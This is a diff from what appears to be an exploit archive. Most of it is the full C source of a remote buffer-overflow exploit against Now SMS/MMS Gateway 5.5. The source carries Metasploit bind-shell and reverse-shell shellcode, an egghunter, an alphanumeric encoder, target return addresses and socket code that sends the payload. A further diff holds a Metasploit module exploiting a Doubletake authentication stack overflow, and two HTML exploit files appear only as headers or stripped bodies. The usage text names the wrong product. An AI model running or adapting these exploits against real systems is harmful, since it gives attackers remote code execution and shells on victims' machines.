+		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
+		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
+		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
+		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
+		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
+		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
+		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
+		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
+		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
+		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
+		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
+		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
+		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
+		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"
+	 },	  
+	 {"ReverseShell      [ args: -R  ]", 
+		287,
+		/*
+		* windows/shell_reverse_tcp - 287 bytes
+		* http://www.metasploit.com
+		* Encoder: generic/none	
+		*/	
+		"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
+		"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
+		"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
+		"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
+		"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
+		"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
+		"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
+		"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
+		"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
+		"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
+		"\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66"
+		"\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff"
+		"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a"
+		"\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95"
+		"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68"
+		"\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+		"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff"
+		"\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04"
+		"\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
+		"\xff\xd0"
+	},
+	{NULL, 0, NULL}
+};
+ 
+
+
+ 
+struct _target{
+	const char *t ;
+	unsigned long ret ;
+} targets[]=
+{	
+	{"Now SMS/MMS Gateway universal",          0x10002f9d },
+	{"Now SMS/MMS Gateway v5.5",               0x0027727c },	
+	{"DOS/Crash/Debug/Test/Fun",               0x41414141 },
+	{NULL,                                     0x00000000 }
+};
+
+
+char egghunter[] = 
+	"\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
+	"\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"
+	"\xff\xe7";	
+
+char header_b[] = 
+				"GET / HTTP/1.0\r\n"
+				"User-Agent: ";
+char header_m[] ="\r\n"
+				"Authorization: Basic ";
+char header_e[] = "\r\n\r\n";
+
+
+// memory for buffers
+unsigned char payloadbuffer[10000], a_buffer[10000];
+long dwTimeout=5000;
+int timeout=5000;
+
+// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code
+char alphanum_decoder[] = 
+		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
+		"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+		"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49";
+// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
+int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen )
+{
+	int   i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
+	char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
+	char temp[10];
+	memset(temp, 0 , sizeof(temp));	
+	srand((int)clock());  
+	for(ii=0;ii> 4;
+		B = (input & 0x0f);
+		F = B;
+		i = rand() % ((int)strlen(valid_chars));
+		while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
+		E = valid_chars[i] >> 4;
+		D = (A^E);
+		i = rand() % ((int)strlen(valid_chars));
+		while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
+		C = valid_chars[i] >> 4;
+		sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
+		encoded[strlen(encoded)]=temp[0];
+		encoded[strlen(encoded)]=temp[1];
+	}
+	encoded[strlen(encoded)]='A';
+	*rlen=(int)strlen(encoded);
+	return 1;
+
+}
+
+int main(int argc, char **argv)
+{
+	char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
+	int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999;
+	struct _buf  fshellcode, sbuffer;
+
+	logo();
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	// set defaults
+	sh=0;	
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				if (strchr(optarg,':')==NULL)
+				{
+					remotehost=optarg;
+				}else 
+				{
+					sscanf(strchr(optarg,':')+1, "%d", &port);
+					remotehost=optarg;
+					*(strchr(remotehost,':'))='\0';
+				}
+				break; 				
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;
+			case 'R':
+				HAVE_R=1;
+				if (strchr(optarg,':')==NULL)
+				{
+					reverseip=optarg;
+				}else 
+				{
+					sscanf(strchr(optarg,':')+1, "%d", &reverseport);
+					reverseip=optarg;
+					*(strchr(reverseip,':'))='\0';
+				}
+				break;			
+			case 'T':				
+				sscanf(optarg, "%ld", &dwTimeout);
+				break; 			
+			default:
+	            usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+	sh=HAVE_R;
+
+	if(remotehost == NULL)
+	{
+		printf("   [-] Please enter remotehost\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	print_info_banner_line("Host", remotehost);
+	sprintf(temp1, "%d", port);
+	print_info_banner_line("Port", temp1);
+	print_info_banner_line("Payload", shellcodes[sh].name);
+
+	if(sh==0)
+	{		
+		sprintf(temp1, "%d", 4444);
+		print_info_banner_line("BINDPort", temp1);
+	}
+	if(sh==1)
+	{
+		print_info_banner_line("CB IP", reverseip);
+		sprintf(temp1, "%d", reverseport);
+		print_info_banner_line("CB port", temp1);
+	}
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+
+
+	memset(payloadbuffer, 0, sizeof(payloadbuffer));
+	fshellcode.ptr=payloadbuffer;
+	fshellcode.size=0;	
+
+	memset(a_buffer, 0, sizeof(a_buffer));
+	sbuffer.ptr=a_buffer;
+	sbuffer.size=0;
+
+	if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport))
+	{
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Payload constructed\n");
+	
+	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
+	{
+		printf("   [-] Buffer not constructed\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Final buffer constructed\n");
+	
+
+	if(!execute(&sbuffer, remotehost, port))
+	{
+		printf("   [-] Buffer not sent\n");
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+	printf("   [+] Buffer sent\n");
+	
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport)
+{
+	int x;
+	char fsh[1000];
+
+	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
+	shf->size=shellcodes[sh].length;
+	if(sh==1)
+	{		
+		memset(shf->ptr,0,shf->size+1);
+		memset(fsh,0,sizeof(fsh));
+		memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
+		
+
+		static struct hostent *host = gethostbyname(rerverseip);
+		static struct sockaddr_in addr;
+		if(host == NULL)
+		{
+			printf("   [-] Reverse ip/hostanme is invalid\n");
+			return 0;
+		}
+
+		addr.sin_addr = *(struct in_addr*)host->h_addr;
+		fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ;
+		fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ;
+		fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ;
+		fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ;
+        
+		fsh[166] = ((reverseport >> 8) & 0xff) ;
+		fsh[167] = ((reverseport     ) & 0xff) ;	
+		
+		memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1);
+		alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x);
+		shf->size = sizeof(alphanum_decoder)-1+x;
+	}
+	return 1;
+}
+
+int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
+{
+	unsigned char * cp, *lp ;
+	char buf[10000],encoded[10000],encoded2[10000], useragent[10000];
+	int len, slen;
+
+	//
+	cp=(unsigned char *)useragent;	
+	*cp++ = '\x44';
+	*cp++ = '\x46';
+	*cp++ = '\x58';
+	*cp++ = '\x50';
+	*cp++ = '\x44';
+	*cp++ = '\x46';
+	*cp++ = '\x58';
+	*cp++ = '\x50';
+	*cp++ = '\x41';
+	*cp++ = '\x41';
+	*cp++ = '\x41';
+	memcpy(cp, shf->ptr, shf->size);
+	cp+=shf->size;
+	slen=(int)(cp-(unsigned char *)useragent);
+
+	
+	// make egghunter
+	memset(buf, 0, sizeof(buf));
+	memset(encoded, 0, sizeof(encoded));
+	memset(encoded2, 0, sizeof(encoded2));
+
+	cp=(unsigned char *)buf;
+	memset(cp, '\x41', 129);	
+	cp+=129;	
+
+	*cp++ = (unsigned char)((targets[target].ret      ) & 0xff);
+	*cp++ = (unsigned char)((targets[target].ret >>  8) & 0xff);
+	*cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff);
+	*cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff);
+
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+
+	memcpy(cp, egghunter, strlen(egghunter));
+	cp+=strlen(egghunter);
+
+	memset(cp, '\x42', 500);	
+	cp+=500;		
+	len=(int)(cp-(unsigned char * )buf);
+	base64_encode((const unsigned char *)buf,len,(char *)encoded);
+	base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2);
+	// ---
+
+
+	cp = sbuf->ptr;
+	memcpy(cp, header_b,strlen(header_b));
+	cp+=strlen(header_b);
+	memcpy(cp, useragent,slen);
+	cp+=slen;	
+	memcpy(cp, header_m,strlen(header_m));
+	cp+=strlen(header_m);
+	memcpy(cp, encoded2,strlen(encoded2));
+	cp+=strlen(encoded2);	
+	memcpy(cp, header_e,strlen(header_e));
+	cp+=strlen(header_e);
+	
+	sbuf->size=(int)(cp-sbuf->ptr);
+	return 1;
+}
+
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str)
+{
+	if (strchr(str,':')==NULL)
+	{
+		remotehost=str;
+	}else 
+	{
+		sscanf(strchr(str,':')+1, "%d", port);
+		remotehost=str;
+		*(strchr(remotehost,':'))='\0';
+	}
+}
+
+
+
+int hr2_connect(char * remotehost, int port, int timeout)
+{
+	SOCKET s;
+	struct hostent *host;
+	struct sockaddr_in addr;
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set x;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+	    stTime.tv_sec = timeout / 1000;
+	    stTime.tv_usec = timeout % 1000;
+	    pstTime = &stTime;
+	}
+
+	host = gethostbyname(remotehost);
+	if (!host) return SOCKET_ERROR;
+
+	addr.sin_addr = *(struct in_addr*)host->h_addr;
+	addr.sin_port = htons(port);
+	addr.sin_family = AF_INET;
+
+	s = socket(AF_INET, SOCK_STREAM, 0);
+	if (s == SOCKET_ERROR)
+	{
+		closesocket(s);
+		return SOCKET_ERROR;
+	}
+
+	unsigned long l = 1;
+	ioctlsocket( s, FIONBIO, &l ) ;
+
+	connect(s, (struct sockaddr*)&addr, sizeof(addr));
+
+	FD_ZERO(&x);
+	FD_SET(s, &x);
+
+	res = select(NULL,NULL,&x,NULL,pstTime);
+	if(res< 0) return SOCKET_ERROR;
+	if(res==0) return 0;
+	return (int)s;
+}
+
+
+int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	return send(s, (char *)buf, len, 0);
+}
+
+int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+	TIMEVAL stTime;
+	TIMEVAL *pstTime = NULL;
+	fd_set xy;
+	int res;
+
+	if (INFINITE != timeout) 
+	{
+	    stTime.tv_sec = timeout / 1000;
+	    stTime.tv_usec = timeout % 1000;
+	    pstTime = &stTime;
+	}
+	FD_ZERO(&xy);
+	FD_SET(s, &xy);
+	
+	res = select(NULL,&xy,NULL,NULL,pstTime);
+
+	if(res==0) return 0;
+	if(res<0) return -1;
+
+	return recv(s, (char *)buf, len, 0);
+}
+
+int execute(struct _buf * abuf, char * remotehost, int port)
+{
+	int x;
+	SOCKET s ;
+
+	s = hr2_connect(remotehost, port, 10000);
+	if(s==0)
+	{
+		printf("   [-] connect() timeout\n");
+		return 0;
+	}
+	if(s==SOCKET_ERROR)
+	{
+		printf("   [-] Connection failed\n");
+		return 0;
+	}		
+	x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
+	printf("   [+] Sent %d out of %d bytes\n", x, abuf->size);
+
+	closesocket(s);
+	return 1;
+}
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+
+// -----------------------------------------------------------------
+// BASE64
+// -----------------------------------------------------------------
+char base64_chars[] = 
+             "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+             "abcdefghijklmnopqrstuvwxyz"
+             "0123456789+/";
+
+
+static inline bool is_base64(unsigned char c) {
+  return (isalnum(c) || (c == '+') || (c == '/'));
+}
+
+void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) 
+{
+  int i = 0;
+  int j = 0;
+  unsigned char char_array_3[3];
+  unsigned char char_array_4[4];
+
+  while (in_len--) 
+  {
+    char_array_3[i++] = *(bytes_to_encode++);
+    if (i == 3) {
+      char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
+      char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
+      char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
+      char_array_4[3] = char_array_3[2] & 0x3f;
+
+      for(i = 0; (i <4) ; i++)
+		ret[strlen(ret)]=base64_chars[char_array_4[i]];
+      i = 0;
+    }
+  }
+
+  if (i)
+  {
+    for(j = i; j < 3; j++)
+      char_array_3[j] = '\0';
+
+    char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
+    char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
+    char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
+    char_array_4[3] = char_array_3[2] & 0x3f;
+
+    for (j = 0; (j < i + 1); j++)
+		ret[strlen(ret)]=base64_chars[char_array_4[j]];
+
+    while((i++ < 3))
+		ret[strlen(ret)]='=';
+
+  }
+
+
+}
+
+// -----------------------------------------------------------------
+// End of BASE64
+// -----------------------------------------------------------------
+
+
+
+
+void print_info_banner_line(const char * key, const char * val)
+{
+	char temp1[100], temp2[100];
+
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp1, '\x20' , 58 - strlen(val) -1);	
+
+	memset(temp2,0,sizeof(temp2));
+	memset(temp2, '\x20' , 8 - strlen(key));	
+	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
+
+}
+
+
+
+void usage(char * s)
+{	
+	int j;
+	printf("\n");
+	printf("    Usage: %s -h  -t  -R \n", s);
+	printf("   -------------------------------------------------------------------\n");
+	printf("    Arguments:\n");
+	printf("      -h ........ host to attack, default port: 8800\n");
+	printf("      -t ........ target to use\n");	
+	printf("      -R ........ host and port for back connect\n");	
+	printf("      -T ........ socket timeout\n");
+	printf("\n");
+	printf("    Supported ASUS DPCProxy versions:\n");
+	for(j=0; targets[j].t!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, targets[j].t);
+	}					
+	printf("\n");
+	for(j=0; shellcodes[j].name!=0;j++)
+	{
+		printf("      %d. %s\n",j+1, shellcodes[j].name);
+	}		
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit  # \n");
+	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
+	printf(" #  Version : 1.0                                                      # \n");
+	printf(" #  System  : Windows ALL                                              # \n");
+	printf(" #  Date    : 14.04.2008                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2008-05-29]
diff --git a/platforms/windows/remote/572.pl b/platforms/windows/remote/572.pl
index c8eec0130..09997002e 100755
--- a/platforms/windows/remote/572.pl
+++ b/platforms/windows/remote/572.pl
@@ -33,6 +33,6 @@ print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
 
 
 print "\n--zzz--\n"; 
-
-
-# milw0rm.com [2004-10-11]
+
+
+# milw0rm.com [2004-10-11]
diff --git a/platforms/windows/remote/5732.html b/platforms/windows/remote/5732.html
index d90802101..0de831cd8 100755
--- a/platforms/windows/remote/5732.html
+++ b/platforms/windows/remote/5732.html
@@ -1,67 +1,67 @@
-
-
-
-
-
-
-
-
-
-
-
- 
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-06-03]
+
+
+
+
+
+
+
+
+
+
+
+ 
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-06-03]
diff --git a/platforms/windows/remote/5738.rb b/platforms/windows/remote/5738.rb
index eaa6ff77e..3b2d36279 100755
--- a/platforms/windows/remote/5738.rb
+++ b/platforms/windows/remote/5738.rb
@@ -1,87 +1,87 @@
-##
-# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote
-	include Exploit::Remote::Tcp
-	include Exploit::Remote::Seh
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'doubletake Overflow',
-			'Description'    => %q{
-					This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded
-					as hp storage works Vulnerability found by Titon of Bastard Labs.
-			},
-			'Author'         => [ 'ri0t ' ],
-			'Version'        => '$Revision: 9 $',
-			'References'     => 
-				[
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 500,
-					'BadChars' => "\x00",
-				},
-			'Platform'       => 'win',
-			
-			'Targets'        =>
-				[
-					['doubletake 4.5.0',    { 'Ret' =>  0x006f5fa7, 'Offset' => 5544 } ],
-					['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ],  
-					['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],
-				],
-			 'DefaultTarget' => 0,
-
-			'Privileged'     => false,
-
-			'DisclosureDate' => ''
-
-			))
-
-			register_options(
-			[
-				Opt::RPORT(1100)
-			], self.class)
-	end
-
-	def exploit
-                xor = Rex::Encoding::Xor::Byte
-		connect
-
-		print_status("Trying target #{target.name}...")
-
-                header = 
-               "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
-               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
-               "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"
-
-		filler =  rand_text_english(1) * (target['Offset'])
-		seh = generate_seh_payload(target.ret)
-                buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C"))
-		sploit =  header + filler + buffercoded[0]
-		sock.put(sploit)
-		handler
-		disconnect	
-	end
-
-end
-end
-
-# milw0rm.com [2008-06-04]
+##
+# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote
+	include Exploit::Remote::Tcp
+	include Exploit::Remote::Seh
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'doubletake Overflow',
+			'Description'    => %q{
+					This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded
+					as hp storage works Vulnerability found by Titon of Bastard Labs.
+			},
+			'Author'         => [ 'ri0t ' ],
+			'Version'        => '$Revision: 9 $',
+			'References'     => 
+				[
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 500,
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			
+			'Targets'        =>
+				[
+					['doubletake 4.5.0',    { 'Ret' =>  0x006f5fa7, 'Offset' => 5544 } ],
+					['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ],  
+					['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],
+				],
+			 'DefaultTarget' => 0,
+
+			'Privileged'     => false,
+
+			'DisclosureDate' => ''
+
+			))
+
+			register_options(
+			[
+				Opt::RPORT(1100)
+			], self.class)
+	end
+
+	def exploit
+                xor = Rex::Encoding::Xor::Byte
+		connect
+
+		print_status("Trying target #{target.name}...")
+
+                header = 
+               "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
+               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
+               "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"
+
+		filler =  rand_text_english(1) * (target['Offset'])
+		seh = generate_seh_payload(target.ret)
+                buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C"))
+		sploit =  header + filler + buffercoded[0]
+		sock.put(sploit)
+		handler
+		disconnect	
+	end
+
+end
+end
+
+# milw0rm.com [2008-06-04]
diff --git a/platforms/windows/remote/5741.html b/platforms/windows/remote/5741.html
index 7a00ee351..b7beb42d4 100755
--- a/platforms/windows/remote/5741.html
+++ b/platforms/windows/remote/5741.html
@@ -1,303 +1,303 @@
-
-        
-
-    
-
-    
-
-        
-
-        
-            
-                
-  Download Manager 
-  
-
-            
-
-        
-
-        
-
-        
-        
-            
-
-    
-
-    
-
-        
-
-        
-            
-                
-                    
-                        
-
-
    
-About the Download Manager
    
-
    The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets.  It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.
    	
-
    Should the Download Manager fail to start, or if you do not accept the security certificate, you can click here to download the file without using the download manager.
    
-
    
-
-                    
-            
-
-        
-
-        
    
-
-        
-
-    
-
-
-
-# milw0rm.com [2008-06-04]
+
+        
+
+    
+
+    
+
+        
+
+        
+            
+                
+  Download Manager 
+  
+
+            
+
+        
+
+        
+
+        
+        
+            
+
+    
+
+    
+
+        
+
+        
+            
+                
+                    
+                        
+
+
    
+About the Download Manager
    
+
    The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets.  It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.
    	
+
    Should the Download Manager fail to start, or if you do not accept the security certificate, you can click here to download the file without using the download manager.
    
+
    
+
+                    
+            
+
+        
+
+        
    
+
+        
+
+    
+
+
+
+# milw0rm.com [2008-06-04]
diff --git a/platforms/windows/remote/5746.html b/platforms/windows/remote/5746.html
index 5e3502c95..bda61f3e1 100755
--- a/platforms/windows/remote/5746.html
+++ b/platforms/windows/remote/5746.html
@@ -1,85 +1,85 @@
-----------------------------------------------------------------------------
- Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow
- url: http://www.blackice.com
-
- File : BITiff.ocx
- Ver. : 10.9.3.0
- CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3}
-
- Mark.: RegKey Safe for Script: True
-        RegKey Safe for Init: True
-        Implements IObjectSafety: False
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Windows XP Professional SP3 fully patched, with Internet Explorer 7
- Windows 2k Professional SP4 fully patched, with Internet Explorer 6
-
- In memory of rgod
------------------------------------------------------------------------------
-
-
-
-
-
-
-# milw0rm.com [2008-06-05]
+----------------------------------------------------------------------------
+ Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow
+ url: http://www.blackice.com
+
+ File : BITiff.ocx
+ Ver. : 10.9.3.0
+ CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3}
+
